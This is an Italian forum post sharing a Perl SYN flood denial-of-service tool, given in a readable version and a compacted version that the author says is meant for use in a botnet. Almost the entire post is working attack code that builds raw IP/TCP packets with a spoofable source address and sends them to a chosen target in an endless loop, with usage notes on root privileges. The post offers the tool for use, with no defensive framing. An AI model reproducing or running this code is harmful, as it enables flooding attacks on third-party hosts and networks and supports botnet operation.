| vogy |
| | ero un po' incasinato su come presentare il programma; in teoria andrebbe usato in botnet però così il codice fa schifo :O Alora ho pensato di darlo nelle due versioni, 'normale' di prova e contratta da bot. Ricordo che il SYN flood funziona malissimo sotto Windows (tutto il resto va bene, anche Mac) e *richiede privilegi di root* per la creazione di SOCKET_RAW. Pulita CODICE #!/usr/bin/perl -w
# Raw socket SYN flood
use strict; use Socket; use Getopt::Long; our ($s_host, $s_port, $dest_host, $t_host, $t_port, $sock);
my $input_data = $ARGV[0]; if(!defined $input_data) { usage(); } GetOptions ('sh|source-host=s' => \$s_host, 'sp|source-port=i' => \$s_port, 'th|target-host=s' => \$dest_host, 'tp|target-port=i' => \$t_port); if(!defined $s_host or !defined $s_port or !defined $dest_host or !defined $t_port) { usage(); } $s_host = (gethostbyname($s_host))[4]; $t_host = (gethostbyname($dest_host))[4];
socket($sock , AF_INET, SOCK_RAW, 255) || die $!; my($packet) = buildpacket($s_host, $s_port, $t_host, $t_port); # http://perldoc.perl.org/functions/pack.html my($target) = pack('Sna4x8', AF_INET, $t_port, $t_host);
while (1) { send($sock , $packet , 0 , $target) || die "no socket send!\n"; print "send socket...\n"; }
sub usage { print "\nUsage: $0 -sh|--source-host <host> -sp|--source-port <port> th|target-host <host> tp|target-port <port>\n\n"; print "-sh|--source-host <host> host sending syn-flood, choose any :-)\n"; print "-sp|--source-port <port> port (on source-host) sending syn-flood... choose any\n"; print "-th|--target-host <host> host to flood\n"; die "-tp|--target-port <port> port (on target-host) syn-flooded\n\n"; }
sub buildpacket { # reference: http://sock-raw.org/papers/sock_raw # not checksum [=0] my $temp_header = pack('nnNNH2B8nvn', $s_port, $t_port, 13456, 0, 50, 00000010, 124, 0, 44 ); my $tcp_form = pack('a4a4CCn', $s_host, $t_host, 0, 6, length($temp_header) ) . $temp_header;
my $checked_tcp = &checksum($tcp_form);
my $tcp_header = pack( 'nnNNH2B8nvn', $s_port, $t_port, 13456, 0, 50, 00000010, 124, $checked_tcp, 44 ); my $ip_header = pack('H2CnnB16CCna4a4', 45, 00, 40, 19245, "0100000000000000", 25, 6, 0, $s_host, $t_host); my $raw_packet = $ip_header.$tcp_header; return $raw_packet }
sub checksum { # default function by W. Richard Stevens.
my ($msg) = @_; my ($len_msg,$num_short,$short,$chk); $len_msg = length($msg); $num_short = $len_msg / 2; $chk = 0; foreach $short (unpack("S$num_short", $msg)) { $chk += $short; } $chk += unpack("C", substr($msg, $len_msg - 1, 1)) if $len_msg % 2; $chk = ($chk >> 16) + ($chk & 0xffff); return(~(($chk >> 16) + $chk) & 0xffff); } Contratta: CODICE #!/usr/bin/perl # Raw socket SYN flood #usage: $0 <source host> <source port> <target host> <target port> use strict;use Socket;our ($sock); my $s_host=(gethostbyname($ARGV[0]))[4];my $s_port=$ARGV[1]; my $t_host=(gethostbyname($ARGV[2]))[4];my $t_port=$ARGV[3]; socket($sock ,AF_INET,SOCK_RAW,255) || die; my($packet)=buildpacket($s_host,$s_port,$t_host,$t_port); my($target)=pack('Sna4x8',AF_INET,$t_port,$t_host); while (1) {send($sock ,$packet ,0 ,$target) || die;} sub buildpacket { my $temp_header=pack('nnNNH2B8nvn',$s_port,$t_port,13456,0,50,00000010,124,0,44 ); my $tcp_form=pack('a4a4CCn',$s_host,$t_host,0,6,length($temp_header) ) . $temp_header; my $checked_tcp=&checksum($tcp_form); my $tcp_header=pack( 'nnNNH2B8nvn',$s_port,$t_port,13456,0,50,00000010,124,$checked_tcp,44 ); my $ip_header=pack('H2CnnB16CCna4a4',45,00,40,19245,"0100000000000000",25,6,0,$s_host,$t_host); my $raw_packet=$ip_header.$tcp_header;return $raw_packet } sub checksum {my ($msg)=@_;my ($len_msg,$num_short,$short,$chk);$len_msg=length($msg); $num_short=$len_msg / 2;$chk=0;foreach $short (unpack("S$num_short",$msg)) { $chk += $short;} $chk += unpack("C",substr($msg,$len_msg - 1,1)) if $len_msg % 2;$chk=($chk >> 16) + ($chk & 0xffff); return(~(($chk >> 16) + $chk) & 0xffff);} P.S. È un bel sorcio (con link alle reference), Non Ci Fate Caxxate...
| | |
| |
|